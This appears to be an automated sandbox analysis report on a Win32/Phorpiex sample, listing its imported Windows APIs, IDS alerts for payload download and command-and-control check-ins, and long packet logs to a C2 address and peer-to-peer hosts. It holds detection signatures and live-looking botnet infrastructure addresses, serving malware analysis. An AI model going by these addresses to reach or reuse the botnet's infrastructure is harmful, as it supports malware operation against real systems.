USER32.dll | GetDC, ReleaseDC, MonitorFromPoint, MonitorFromWindow, ShowWindow, IsDialogMessageW, LoadCursorW, GetMonitorInfoW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, SetWindowPos, CreateWindowExW, UnregisterClassW, RegisterClassW, PostQuitMessage, DefWindowProcW, DispatchMessageW, TranslateMessage, GetMessageW, WaitForInputIdle, IsWindow, PostMessageW, LoadBitmapW
GDI32.dll | DeleteObject, SelectObject, StretchBlt, GetObjectW, DeleteDC, CreateDCW, CreateCompatibleDC, GetDeviceCaps
ADVAPI32.dll | GetUserNameW, CryptAcquireContextW, CryptReleaseContext, QueryServiceConfigW, CryptGetHashParam, CryptCreateHash, CryptHashData, CryptDestroyHash, OpenProcessToken, AllocateAndInitializeSid, CheckTokenMembership, GetTokenInformation, AdjustTokenPrivileges, IsWellKnownSid, LookupPrivilegeValueW, RegCreateKeyExW, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, ChangeServiceConfigW, SetEntriesInAclW, DecryptFileW, InitializeAcl, CreateWellKnownSid, ConvertStringSecurityDescriptorToSecurityDescriptorW, ReportEventW, OpenEventLogW, CloseEventLog, RegQueryInfoKeyW, RegDeleteValueW, RegQueryValueExW, InitiateSystemShutdownExW, RegOpenKeyExW, RegCloseKey, SetNamedSecurityInfoW, RegDeleteKeyW, RegEnumKeyExW, RegEnumValueW, RegSetValueExW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetEntriesInAclA
ole32.dll | CoInitializeEx, CoInitialize, CoInitializeSecurity, CoUninitialize, CLSIDFromProgID, CoTaskMemFree, StringFromGUID2, CoCreateInstance
OLEAUT32.dll | SysFreeString, VariantInit, SysAllocString, VariantClear
SHELL32.dll | ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T07:26:10.813025+0200 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 185.215.113.66 | 80 | 192.168.2.5 | 49720 | TCP
2024-10-26T07:26:10.813025+0200 | 2853272 | ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound | 1 | 185.215.113.66 | 80 | 192.168.2.5 | 49720 | TCP
2024-10-26T07:26:10.813025+0200 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.5 | 49771 | TCP
2024-10-26T07:26:17.704809+0200 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.5 | 49720 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:17.704902+0200 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 185.215.113.66 | 80 | 192.168.2.5 | 49720 | TCP
2024-10-26T07:26:19.836764+0200 | 2856563 | ETPRO MALWARE Phorpiex Domain in DNS Lookup | 1 | 192.168.2.5 | 54677 | 1.1.1.1 | 53 | UDP
2024-10-26T07:26:20.780864+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49721 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:25.627582+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49721 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:25.627582+0200 | 2853292 | ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin | 1 | 192.168.2.5 | 49721 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:31.911590+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49771 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:31.911590+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.5 | 49771 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:33.655013+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.5 | 65053 | 195.82.3.15 | 40500 | UDP
2024-10-26T07:26:33.827471+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49784 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:33.827471+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.5 | 49784 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:34.137114+0200 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.5 | 49784 | TCP
2024-10-26T07:26:38.654038+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.5 | 65053 | 2.184.189.189 | 40500 | UDP
2024-10-26T07:26:39.456586+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49812 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:39.456586+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.5 | 49812 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:41.389569+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49823 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:41.389569+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.5 | 49823 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:43.670932+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.5 | 65053 | 151.246.159.157 | 40500 | UDP
2024-10-26T07:26:44.712858+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49841 | 91.202.233.141 | 80 | TCP
2024-10-26T07:26:48.393009+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49864 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:48.393009+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.5 | 49864 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:48.687298+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.5 | 65053 | 2.180.10.247 | 40500 | UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                        Oct 26, 2024 07:26:21.094800949 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094810963 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094816923 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094840050 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094867945 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.095556974 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.095582962 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.095607042 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.095624924 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:25.246774912 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:25.252224922 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:25.627481937 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:25.627582073 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:27.747546911 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:30.989178896 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:30.994569063 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:30.994654894 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:30.994864941 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.000217915 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911458969 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911535025 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911545992 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911556959 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911569118 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911587954 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911590099 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911601067 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911608934 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911621094 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911623001 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911633015 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911695004 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911695004 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.913506985 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.913506985 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.917013884 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.917043924 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.917069912 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.917133093 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.917160034 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.917217970 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.918739080 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.925472021 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:32.925554991 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.925695896 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.931099892 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.654453993 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.659785986 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.659888029 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.661674023 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.666906118 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.666954041 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.672313929 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827378988 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827410936 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827430964 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827442884 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827462912 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827471018 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827477932 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827490091 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827513933 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827523947 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827524900 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827538013 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827553034 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827562094 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827593088 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.832870007 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.832880974 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.832890987 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.832945108 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.982999086 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983017921 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983030081 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983043909 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983055115 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983076096 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983098030 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983129978 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983275890 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983289003 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983299971 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983318090 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983335018 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983335018 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983365059 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983921051 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983932972 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983944893 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983964920 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983968973 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983973026 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983989954 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984010935 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984034061 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984749079 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984801054 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984844923 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984858036 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984870911 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984884977 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984894037 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984903097 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984926939 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.985647917 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985658884 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985671043 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985683918 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985716105 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.985728979 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.988389015 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.988399982 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.988440990 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137038946 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137054920 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137089968 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137101889 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137108088 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137114048 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137149096 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137149096 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137181044 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137193918 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137206078 CEST8049784185.215.113.66192.168.2.5
Timestamp                             SrcPort  DstPort  SrcIP            DstIP
Oct 26, 2024 07:26:34.137214899 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137226105 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137238026 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137247086 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137250900 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137271881 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137290955 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137746096 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137790918 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137793064 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137815952 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137868881 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137868881 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137891054 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137903929 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137908936 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.137934923 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.137952089 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138108015 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138150930 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138160944 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138176918 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138219118 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138247013 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138259888 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138272047 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138289928 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138307095 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138622999 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138636112 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138648033 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138665915 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138681889 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138708115 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138720989 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138731956 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138744116 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138755083 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138792038 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138823986 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138838053 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138849020 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138860941 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.138870955 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.138906956 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139549971 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139569044 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139581919 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139610052 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139646053 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139657021 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139668941 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139681101 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139693975 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139705896 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139723063 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139739990 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139743090 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139755011 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139766932 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.139789104 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.139811039 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.140402079 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.140414953 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.140427113 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.140445948 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.140450954 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.140489101 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.290965080 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.290986061 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291032076 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291035891 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291068077 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291075945 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291084051 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291096926 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291109085 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291121006 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291150093 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291204929 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291253090 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291263103 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291309118 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291367054 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291383982 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291438103 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291435003 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291476965 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291488886 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291490078 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291511059 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291515112 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291522980 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291534901 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:34.291536093 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291557074 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:34.291587114 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:36.464899063 CEST  49788    40500    192.168.2.5      149.54.47.90
Oct 26, 2024 07:26:36.511399984 CEST  40500    49788    149.54.47.90     192.168.2.5
Oct 26, 2024 07:26:38.545320988 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:38.545670986 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:38.551078081 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:38.551155090 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:38.551296949 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:38.551336050 CEST  80       49784    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:38.551393032 CEST  49784    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:38.556760073 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456511021 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456531048 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456542969 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456554890 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456567049 CEST  80       49812    185.215.113.66   192.168.2.5
Oct 26, 2024 07:26:39.456585884 CEST  49812    80       192.168.2.5      185.215.113.66
Oct 26, 2024 07:26:39.456604004 CEST  80       49812    185.215.113.66   192.168.2.5
